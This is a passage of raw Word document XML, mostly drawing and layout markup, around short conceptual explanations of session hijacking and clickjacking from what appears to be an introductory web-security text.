                <v:shape id="Shape 1551" o:spid="_x0000_s1128" style="position:absolute;left:2065;width:6969;height:5939;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="696827,59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lbSwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La4NA&#10;EL4X8h+WCfRWV1sswbgJIRBoyUGaB7lO3IlK3FlxV2P/fbdQ6G0+vufk68m0YqTeNZYVJFEMgri0&#10;uuFKwem4e1mAcB5ZY2uZFHyTg/Vq9pRjpu2Dv2g8+EqEEHYZKqi97zIpXVmTQRfZjjhwN9sb9AH2&#10;ldQ9PkK4aeVrHL9Lgw2Hhho72tZU3g+DUTCMe1lcjp/F/prwQJu3nXfdWann+bRZgvA0+X/xn/tD&#10;h/lpmsDvN+EEufoBAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAtm5W0sMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m696827,593992r-367331,l329496,,,,,175524e" filled="f" strokecolor="#4672c4" strokeweight=".32289mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,696827,593992"/>
                </v:shape>
                <v:shape id="Shape 1552" o:spid="_x0000_s1129" style="position:absolute;left:1619;top:1652;width:893;height:819;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="89231,8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4HxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dagIx&#10;EIXvBd8hjNAbqYlWS1mNUlsKFkHwB3o7bsbdxc0k3aS6ffumIHg3wzlzvjOzRWtrcaEmVI41DAcK&#10;BHHuTMWFhsP+4/EFRIjIBmvHpOGXAizm3c4MM+OuvKXLLhYihXDIUEMZo8+kDHlJFsPAeeKknVxj&#10;Maa1KaRp8JrCbS1HSj1LixUnQome3krKz7sfmyDDr3bM6v17yWrZ/zxu/NN65bV+6LWvUxCR2ng3&#10;365XJtWfTEbw/00aQc7/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABgY/gfHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m,l89231,,44616,81833,,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,89231,81833"/>
                </v:shape>
                <v:shape id="Shape 1553" o:spid="_x0000_s1130" style="position:absolute;left:2065;top:14654;width:5918;height:10058;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="591803,100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FFwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFLzVbH1VtkYRq+C120qvw2bcXd1Mtkl003/fCAVv8/E9Z7GKphVXcr6xrOBlmIEgLq1u&#10;uFLw9bl7noPwAVlja5kU/JKH1fLxYYG5tj1/0LUIlUgh7HNUUIfQ5VL6siaDfmg74sQdrTMYEnSV&#10;1A77FG5aOcqymTTYcGqosaNNTeW5uBgFcUY/8eA221M/iZf3w+u2OH2flRo8xfUbiEAx3MX/7r1O&#10;86fTMdy+SSfI5R8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA6ekxRcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,758728r,247124l310598,1005852,310598,,591803,e" filled="f" strokecolor="#4672c4" strokeweight=".32289mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,591803,1005852"/>
                </v:shape>
                <v:shape id="Shape 1554" o:spid="_x0000_s1131" style="position:absolute;left:7872;top:14245;width:892;height:818;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="89231,8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ng4xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhF5Cs1EaKamrGKXQi0pj6XnITpO02dmQ3cb477uC0Ns83uesNqNpxUC9aywrmMcJCOLS&#10;6oYrBR/n18dnEM4ja2wtk4IrOdisp5MVZtpe+J2GwlcihLDLUEHtfZdJ6cqaDLrYdsSB+7K9QR9g&#10;X0nd4yWEm1YukmQpDTYcGmrsaFdT+VP8GgWWkzL/PO274/Vwsmk0j/LvY6TUw2zcvoDwNPp/8d39&#10;psP8NH2C2zfhBLn+AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJJWeDjEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l89231,40917,,81834,,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,89231,81834"/>
                </v:shape>
                <v:rect id="Rectangle 1556" o:spid="_x0000_s1132" style="position:absolute;left:476;top:11378;width:4139;height:13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cxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LCL01G0vVkmYjUijppYKPisdpdvLA7GyaXTX9925B8DYf33PSxWBacabeNZYVTKIYBHFh&#10;dcOVgt324+kVhPPIGlvLpOCPHCyy0UOKibYXXtN54ysRQtglqKD2vkukdEVNBl1kO+LAlbY36APs&#10;K6l7vIRw08rnOJ5Jgw2Hhho7eq+pOG5ORsH3ZHva5271w4fyd/7y5fNVWeVKPY6H5RsIT4O/i2/u&#10;Tx3mT6cz+P8mnCCzKwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAJ/V7cxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3347FA41" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>PERSON</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E5E176" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="1084"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36073C57" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:sectPr w:rsidR="00F97B52">
          <w:headerReference w:type="even" r:id="rId30"/>
          <w:headerReference w:type="default" r:id="rId31"/>
          <w:footerReference w:type="even" r:id="rId32"/>
          <w:footerReference w:type="default" r:id="rId33"/>
          <w:headerReference w:type="first" r:id="rId34"/>
          <w:footerReference w:type="first" r:id="rId35"/>
          <w:pgSz w:w="11911" w:h="16841"/>
          <w:pgMar w:top="1580" w:right="1242" w:bottom="1188" w:left="1340" w:header="480" w:footer="478" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA2B297" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-866" w:right="-845"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F61F0C" wp14:editId="0411CCA8">
            <wp:extent cx="6961633" cy="10088880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46958" name="Picture 46958"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="46958" name="Picture 46958"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6961633" cy="10088880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA34A7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Session Hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2D6CA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="12"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E6E157" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="355" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack employs a hijacked session, as the name suggests. It is an attack in which the victim has no control over his or her session. For instance, if you use a website to access your mail, your session begins once you log in and ends when you log out. Cookies include information about your account that hackers can exploit to access your session. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355FBE44" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="370" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker has to know your session ID, which they may get from your session key, in order to do session hijacking. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351313B1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E730BD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="370" w:right="594" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After successfully hijacking a session, an attacker can do anything, including: 1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Steal Private Information </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45886B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F4ED4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Move money around. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D012AE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6953D5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gather contact information of the user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1FC2D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF43678" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gather official user data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA778D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="15"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642953E2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Buy something on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> behalf without his/her permission. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2083E217" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="15"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E854FCA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39E4EC79" wp14:editId="1E50B494">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="42121" name="Group 4212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20" name="Shape 496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21" name="Shape 496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22" name="Shape 496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23" name="Shape 496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24" name="Shape 496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121" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49625" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49626" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49627" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49628" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4962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5888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="192C4458" wp14:editId="5246AEBF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="42122" name="Group 4212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30" name="Shape 496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1" name="Shape 496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32" name="Shape 496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3" name="Shape 496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34" name="Shape 496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122" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49635" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49636" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49637" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49638" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4963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sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypt some crucial information and charge money to unlock it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B52E481" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161506E7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="370" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Clickjacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB67DD2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5705BA14" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="370" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A clickjacking attack deceives a user into clicking an element of a webpage that is hidden or misrepresented as another element. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C07479" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="355" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Due to this, users may unintentionally download malware, browse dangerous websites, disclose personal information or login credentials, send money, or make online purchases. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F410C51" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="355" w:right="119" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
